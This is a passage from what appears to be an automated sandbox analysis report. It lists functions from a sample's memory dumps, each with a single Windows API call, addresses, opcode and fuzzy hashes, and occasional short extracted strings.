Instruction Fuzzy Hash: 7D11E071610200AFF720DA15DC86BBABB98DF44B20F1480AAEE458F281D3B4A954CA61

Uniqueness

Uniqueness Score: -1.00%

Function 052E09F2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E0A51

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 5712b30cb180937ce3f554bdfd98d6ff1fa269bfb0d7fce5371551025011ab16
Instruction ID: f814e167ed3812fa73dcd88638f637fd24c68134345ac6b22fb044e8c6344e03
Opcode Fuzzy Hash: 5712b30cb180937ce3f554bdfd98d6ff1fa269bfb0d7fce5371551025011ab16
Instruction Fuzzy Hash: 6411E371900304AFEB21CF55DC45F6AFBA8EF44B20F1484AAEE498B251C3B4A415CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 052E02DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 052E0353

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e8aa11e48582966e6e6979170e91c1f1dcd545ef20e6daf6a0e6c81fc84c867f
Instruction ID: a72d89507e9ad69e51320d1f81d8a738986c15924682c732c86ae5344412d334
Opcode Fuzzy Hash: e8aa11e48582966e6e6979170e91c1f1dcd545ef20e6daf6a0e6c81fc84c867f
Instruction Fuzzy Hash: D911EF31500700AFEB31DF11DC45F7AFBA8EF44B10F14849AEE894A291C3B1A819CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 012CBB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 012CBBB9

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b577c227a48710e757006a82dc3949eb5909f49ea4bc16995fd2134c6f0e9ee2
Instruction ID: b4c0acf6f90e82a08f6392981e2a5f9f14e59be000070ea3f01f60ee440772a8
Opcode Fuzzy Hash: b577c227a48710e757006a82dc3949eb5909f49ea4bc16995fd2134c6f0e9ee2
Instruction Fuzzy Hash: 9011D0355093C0AFDB228F25CC45B52FFB4EF16220F0885DEEE858B563D265A858CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012CBE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 012CBE70

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 7d53c7c8f4359232a978e50b0424d4b4567d851e603317e8487b10cc2176a4b2
Instruction ID: 929618c6721b48ec49adccc15bc3186526cafe3ef2cbb76f87bc2bc4ee74e758
Opcode Fuzzy Hash: 7d53c7c8f4359232a978e50b0424d4b4567d851e603317e8487b10cc2176a4b2
Instruction Fuzzy Hash: D0117C758093C0AFD7238B259C44B62BFB4DF47624F0980DEEE858F263D2656808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012CB71E, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 012CB78A

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 6578c8f8c4bab3f6248e9764d1f482924eba61fbcdcb24909071c579b8278664
Instruction ID: d5fd7f29f5adf751104d1f85845474e2bb50ba6122cc0ec8c4fc2a7ad655eab2
Opcode Fuzzy Hash: 6578c8f8c4bab3f6248e9764d1f482924eba61fbcdcb24909071c579b8278664
Instruction Fuzzy Hash: C5119D32408380AFDB228F54DC44A66FFF4EF49220F08859EEE858B522C375A418CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012CBEB4, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 012CBF0C

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5876e62be6ab7dc966c7b4d0a74604a0039bb3ed566f7bf224fb58b2e581598f
Instruction ID: a61d1316a279f7a46e70f49f1abc87a827a01814873cf96d79dbea6837c989d2
Opcode Fuzzy Hash: 5876e62be6ab7dc966c7b4d0a74604a0039bb3ed566f7bf224fb58b2e581598f
Instruction Fuzzy Hash: 34118F725053819FD721CF29DC85B56BFE8EF45620F0884AAEE45CF252D275E848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E118F, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 052E11F4

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 47ced7a38f9c72031d3785f8912d0d22d4206cab9e01d9bb8a2c2bfa2211ec94
Instruction ID: bc6300ee667f6ea4805fcd9138b9c62005a756e7f7dd3e7c4d9e121f5cbc9e66
Opcode Fuzzy Hash: 47ced7a38f9c72031d3785f8912d0d22d4206cab9e01d9bb8a2c2bfa2211ec94
Instruction Fuzzy Hash: 171190714093C09FD7128F24DC44B56BFB4EF46224F0984EBED898F163C275A849CB62

Uniqueness

Uniqueness Score: -1.00%

Function 052E131A, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 052E1362

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 35c44b6c9248414a03986e68f3182255296b37e198de426e61267a925273daa1
Instruction ID: 0d7ef85fe1d2103cc6fcfee16b6f4c11be653d097e12cf09e9b7e8503919a9ab
Opcode Fuzzy Hash: 35c44b6c9248414a03986e68f3182255296b37e198de426e61267a925273daa1
Instruction Fuzzy Hash: 55118E71A102018FDB24CF2AD885B66FBE8EF04720F0884BADD4ACB642D270E814CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E0AD6, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 052E0B1E

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 35c44b6c9248414a03986e68f3182255296b37e198de426e61267a925273daa1
Instruction ID: 1baad329b2bb283b7145e864d419045a034323993e0b349f6c1ff369c0ede670
Opcode Fuzzy Hash: 35c44b6c9248414a03986e68f3182255296b37e198de426e61267a925273daa1
Instruction Fuzzy Hash: 87118271A102058FDB20CF6AD889B66FBD8FF04714F0884AEDD49CB242D2B4D805CB71

Uniqueness

Uniqueness Score: -1.00%

Function 012CA75B, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 012CA7BC

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 100e02cf6e5697ac97b743cbf2567cf1333ea4849db2a5053483d9dd971e936e
Instruction ID: 2bf6493b654c2dab51f9910691b23cae743e8616b54760d1b7788d245ad49119
Opcode Fuzzy Hash: 100e02cf6e5697ac97b743cbf2567cf1333ea4849db2a5053483d9dd971e936e
Instruction Fuzzy Hash: 1011E071408384AFD722CF14DC84B56BFB4EF42220F0884DAEE498F253D375A808CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 052E0932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E0985

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: a8b85878a7b68926a5ad0e793f802f78599ffe99c17ebb6f1f9b70bb26815595
Instruction ID: 207311d17389e727413c7d746090372391a67fdf273383355d034b839179751b
Opcode Fuzzy Hash: a8b85878a7b68926a5ad0e793f802f78599ffe99c17ebb6f1f9b70bb26815595
Instruction Fuzzy Hash: 1501C071910744AFF721CF15DC89F7AFBA8EF44B20F14809AEE499B241D3B4A845CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 052E075A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 052E079F

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 5977bd9c5b96753419de69da8327caf33e64c5adfd14bf286b565f703064ed47
Instruction ID: f8286291e45afcd6850139e90baa81745f573f99cbfca86e02bde33bf2d040a3
Opcode Fuzzy Hash: 5977bd9c5b96753419de69da8327caf33e64c5adfd14bf286b565f703064ed47
Instruction Fuzzy Hash: 2211A5716102418FD710CF19D888B66FBD8EF05610F48C4AADD09CB641D2B4D805CF61

Uniqueness

Uniqueness Score: -1.00%

Function 052E1616, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,7DB54636,00000000,?,?,?,?,?,?,?,?,72FE3C38), ref: 052E1656

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 94ddcfd4e26787649ca04121d1aea8d8260a3620150a32d5701cf0369bb5bbb0
Instruction ID: 6253b26e7d5f35a4fb934fdef3ec3efb7b8b5b6ccdd4a92940f31c539db7347d
Opcode Fuzzy Hash: 94ddcfd4e26787649ca04121d1aea8d8260a3620150a32d5701cf0369bb5bbb0
Instruction Fuzzy Hash: 31116D719102449FDB20CF69D884B66FBE8EF05620F18C4BADE4A8B656D274E854CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012CA8CC, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 012CA926

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 9ab250370e49d3c2a53ab6ac9962a439abc4bf5f6d773f5db393038b8e784c93
Instruction ID: 27c5de0b2d413a1c509c47573233397fabb40b1779439951d1e9bc13524f7673
Opcode Fuzzy Hash: 9ab250370e49d3c2a53ab6ac9962a439abc4bf5f6d773f5db393038b8e784c93
Instruction Fuzzy Hash: 7111CE354097849FC7228F15DC85B62FFB4EF06620F09C5DAEE864B263D375A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012CA172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E2C,?,?), ref: 012CA1C2

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: e32e7b4592cf77db70121fa7ca09c96fbea1a74d9a513a8bb7a69d7e79aa5b7d
Instruction ID: 6c7825c9489fe682d8d8e215ab795b6478e0b36d64f2893b9fe3af5d863942af
Opcode Fuzzy Hash: e32e7b4592cf77db70121fa7ca09c96fbea1a74d9a513a8bb7a69d7e79aa5b7d
Instruction Fuzzy Hash: 47017171900201ABD710DF16DC85B26FBA8EB88A20F14856AED099B645E335B916CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 012CBED2, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 012CBF0C

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 94ec13be4135f4993c97f200eea9b926c51397cbbb0068c5ac0489ba87e7c348
Instruction ID: 2e1d746f2ed12b54424acae4b9d904c006a44bd8c0f8628824a3589e55bbee27
Opcode Fuzzy Hash: 94ec13be4135f4993c97f200eea9b926c51397cbbb0068c5ac0489ba87e7c348
Instruction Fuzzy Hash: F501B571A102419FD721DF2AD886766FB94EF00A20F08C1AEEE49CF742D275D804CF61

Uniqueness

Uniqueness Score: -1.00%

Function 052E2F9A, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 052E2FEA

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: c3f1e88ced50993fa28dcb41b3d165c2ee65e6a079c3a1bbb61ecbd43c0bec84
Instruction ID: ae80e961c4e670b49e979f7e85d0e9ef56b76813d2339fdf90580db156da86d4
Opcode Fuzzy Hash: c3f1e88ced50993fa28dcb41b3d165c2ee65e6a079c3a1bbb61ecbd43c0bec84
Instruction Fuzzy Hash: F7017172900201ABD710DF16DC85B26FBA8EB88A20F14856AED099B645E331B916CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 052E0CCA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E2C,?,?), ref: 052E0D1A

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: 78dc2f98ae98ea3869efab767c25e6ca2481a15a1c01057e3e0260695c72775a
Instruction ID: 067df3d98635cc6375eadbed2a037393b79f54d3fa225238103da4bfa981d9e3
Opcode Fuzzy Hash: 78dc2f98ae98ea3869efab767c25e6ca2481a15a1c01057e3e0260695c72775a
Instruction Fuzzy Hash: 11017172900201ABD710DF16DC85B26FBA8FB88A20F14856AED099B645E331B916CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 012CB746, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 012CB78A

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: ab3495b2fccabf3d8ab48e12f976d9cde7a5afd5dcbd85a16db5d7511d922d6b
Instruction ID: e1b54ebae65f02df86237a18f0607590f6284793f6077f5f387ee0f641d1d084
Opcode Fuzzy Hash: ab3495b2fccabf3d8ab48e12f976d9cde7a5afd5dcbd85a16db5d7511d922d6b
Instruction Fuzzy Hash: F8016D32800640DFDB218F55D845B66FFE0EF08720F08C6AEDE8A4B622D375A418DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012CA546, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CA58A

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d7450f50be8ad36ad37ee514907b55c85c35df77c7a2bcddd5f6a2b5706dcbe2
Instruction ID: 4bf6051d01559296f91a9a8f42819088f17f5c5dfbecf740b8430b8a22adf288
Opcode Fuzzy Hash: d7450f50be8ad36ad37ee514907b55c85c35df77c7a2bcddd5f6a2b5706dcbe2
Instruction Fuzzy Hash: C4016D71810644DFDB218F55E844B66FFE0EF48720F08C69EDE4A4B612D375A418DF61

Uniqueness

Uniqueness Score: -1.00%

Function 012CAF9A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 012CAFEA

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8e03633c80883a63e83cb295c7bec2516ecc14a45700886da0eafae8e11f7bd5
Instruction ID: 5d6a29a50533802768043bbed5c6b5dc245ef29d15b4e0f181c1e3f7988c182b
Opcode Fuzzy Hash: 8e03633c80883a63e83cb295c7bec2516ecc14a45700886da0eafae8e11f7bd5
Instruction Fuzzy Hash: 7F01A271500201ABD210DF16DC86B26FBA8FB88A20F14815AED084BB41E331F916CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 052E0232, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 052E0264

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ddd8ed87e4fa47f35c0c5549a38b3f19d9518bdef280a45b99eb9438ea2af20a
Instruction ID: ca0fbbc2d05eb38758e5fe348aff8043b237af9e92e948850aec073c6d0bf4d8
Opcode Fuzzy Hash: ddd8ed87e4fa47f35c0c5549a38b3f19d9518bdef280a45b99eb9438ea2af20a
Instruction Fuzzy Hash: A201F7719002409FDB10CF15D888766FBE4EF40320F08C4ABDD498F602D2B4E804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E156A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 052E159C

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ab9c5e93543d94cbf9663fe3db26325caabfea60734734a8758b86c6720039f9
Instruction ID: 28d620ef23401d04a3f56079a8452b78499c89945574ecab46f94364109d201e
Opcode Fuzzy Hash: ab9c5e93543d94cbf9663fe3db26325caabfea60734734a8758b86c6720039f9
Instruction Fuzzy Hash: 1101F2719102448FDB20CF1AD884B66FBA4EF44620F18C0BBDD4A8F602D274E818CB72

Uniqueness

Uniqueness Score: -1.00%

Function 052E19F6, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 052E1A46

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 924eb7f34b5e15413fe9447b88b709d1005310d072cb0c7bd8648e8e4693c1a1
Instruction ID: 84f7e1bfe8523553285637eee639a459e3951b3965fcdcc5d05760e4684accd6
Opcode Fuzzy Hash: 924eb7f34b5e15413fe9447b88b709d1005310d072cb0c7bd8648e8e4693c1a1
Instruction Fuzzy Hash: BD016272500601ABD210DF16DC86B26FBA8FB88B20F14815AED495BB45E371F916CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 012CBB7E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 012CBBB9

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 676733a1bca40d1bde3d31d66cc42337cbae58a907d73a1132fd651a713f8eeb
Instruction ID: 2d4f6439dc15f41ec0802020107794ab15e4758610867346620c4d672871823d
Opcode Fuzzy Hash: 676733a1bca40d1bde3d31d66cc42337cbae58a907d73a1132fd651a713f8eeb
Instruction Fuzzy Hash: 5801D435910640CFDB318F1AD846B66FBA0EF04720F08C19EDE464B626D371E418CF61

Uniqueness

Uniqueness Score: -1.00%

Function 012CA78A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 012CA7BC

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: cf753435553bbeac2de7a09fffa7d54bcb80b5233b1075eccbb64e99a415ea8a
Instruction ID: 2a2a76518e095890535832290dfb3a2d23bf3fcd9d50c548d79fa04d042d4582
Opcode Fuzzy Hash: cf753435553bbeac2de7a09fffa7d54bcb80b5233b1075eccbb64e99a415ea8a
Instruction Fuzzy Hash: 1F01D674810244DFDB21CF19D88576AFFE4EF44720F08C5EADE4A8F602E275A808CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012CB806, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 012CB841

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 248a880fa4abae3649432f8cb69026abf3d0b138f21b215f01d02ce493fc2875
Instruction ID: c61eb70041d15e03817e2f2b20a7e3e40d48fa958bd20be94d18067470b045f8
Opcode Fuzzy Hash: 248a880fa4abae3649432f8cb69026abf3d0b138f21b215f01d02ce493fc2875
Instruction Fuzzy Hash: 2401A731810644DFDB21CF56D845B66FFA0EF04B20F08C29EDE490B612D375A418CF61

Uniqueness

Uniqueness Score: -1.00%

Function 012CA8EE, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 012CA926

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 30a0576c64cce6e09e8697c99ee8e6ed0faf7a2700b0105f2d62e4ae0f3cf886
Instruction ID: 47cb903b2190254e9dc3f25709918f92460598449e6d9eab06d4d3120d940820
Opcode Fuzzy Hash: 30a0576c64cce6e09e8697c99ee8e6ed0faf7a2700b0105f2d62e4ae0f3cf886
Instruction Fuzzy Hash: 6201A235810644CFDB218F05D886762FFA0EF05B20F08C29ADE4A0B612D375A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012CBE3E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 012CBE70

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: cd8fda097aaf08315c803ca0baad6478d74f1cd86ccdfc58d7faa6ab4735bc11
Instruction ID: b5c124850550a739da619a07a854f2174b74836cdf53624cbfe70a0b9dba2137
Opcode Fuzzy Hash: cd8fda097aaf08315c803ca0baad6478d74f1cd86ccdfc58d7faa6ab4735bc11
Instruction Fuzzy Hash: BDF08135D14644CFDB218F19D886766FBA0DF04B20F48C19ADF494B612D2B5A408CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 012CA372, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 012CA3A4

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cd8fda097aaf08315c803ca0baad6478d74f1cd86ccdfc58d7faa6ab4735bc11
Instruction ID: 04294f45143938b6e6503b8d447e80797a407987cb041197edd6a5709cd2ecd6
Opcode Fuzzy Hash: cd8fda097aaf08315c803ca0baad6478d74f1cd86ccdfc58d7faa6ab4735bc11
Instruction Fuzzy Hash: 1BF0A434910644DFD721CF19D885765FFA0EF04B24F18C1DADE494F652E3B5A444CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02CDF848, Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

MOC, xrefs: 02CDFA0E

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID: MOC
API String ID: 0-624257665
Opcode ID: 1b65c1e3cd2749168e52a809a35af602e84b3d333311e8b3694b9b1c1bf7e4da
Instruction ID: 29073c767f2a8d60d714f99acf8ee569fdb776670cd7e7a14d1bbb2cc351249e
Opcode Fuzzy Hash: 1b65c1e3cd2749168e52a809a35af602e84b3d333311e8b3694b9b1c1bf7e4da
Instruction Fuzzy Hash: 59715130A00A05DFC715CF6AC98096AFBF2BF89304B24852ED64B97A50DB71E942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02CD2D58, Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

, xrefs: 02CD2E76

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 331ac9cfd746d8355b17b1512c58aa21e4ce66086fc512df72f2793cec8003c1
Instruction ID: 83efbc773ff968a7846dea8a7d33f16af431b6c3891fbe97136e3ea052549059
Opcode Fuzzy Hash: 331ac9cfd746d8355b17b1512c58aa21e4ce66086fc512df72f2793cec8003c1
Instruction Fuzzy Hash: 2941B470E042958BCB10DF75C8845AEBBB2ABC121AB29C567CA15DBA07C735D942C793

Uniqueness

Uniqueness Score: -1.00%

Function 02CD0BC0, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

hXVr, xrefs: 02CD0C78

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID: hXVr
API String ID: 0-4019426618
Opcode ID: 9dc872aed0f8b827848babf3e1abd4ea3a52c1c09131499d7d55e1efa79ca4b2
Instruction ID: 8e97dc9b67b727a60586a774b50c1e2c698a90bc3c0a096f07fd93fe7aa2f584
Opcode Fuzzy Hash: 9dc872aed0f8b827848babf3e1abd4ea3a52c1c09131499d7d55e1efa79ca4b2
Instruction Fuzzy Hash: 2F41D431B04104CFCB158B6DC414BAE77E7AFC5710F15846AE906EF2A1CEB29D0AC792

Uniqueness

Uniqueness Score: -1.00%

Function 02CD8830, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 02CD8947

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: c521e15f29cf327e2bf4559cf9230a89759096b6aa7d846b26eaf34f738cc06f
Instruction ID: e64060ab992169f302fddbac41788f68d5610e2162cdfa25a7fd001acdf4069b
Opcode Fuzzy Hash: c521e15f29cf327e2bf4559cf9230a89759096b6aa7d846b26eaf34f738cc06f
Instruction Fuzzy Hash: DD414D30E04209DFCF58DFA6C9456BEBBB1FF84304F50866AD602A76A4DB355A42CF52

Uniqueness

Uniqueness Score: -1.00%

Function 02CD21F8, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 02CD230F

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: eb3ea73adf23f7d524ff03bc29de8e709caaa3e3a1496995596345e3559a4768
Instruction ID: e563e15276fb45ff5be566c672a0a137490441c5f4d3c00da980fb90c5ade750
Opcode Fuzzy Hash: eb3ea73adf23f7d524ff03bc29de8e709caaa3e3a1496995596345e3559a4768
Instruction Fuzzy Hash: F5412970E09209CFCB48DFB6C4497AEBBB1FB84314F10806AEA02A7265D7358A05CF53

Uniqueness

Uniqueness Score: -1.00%

Function 02CD50E0, Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

d@Ur, xrefs: 02CD51BC

Memory Dump Source

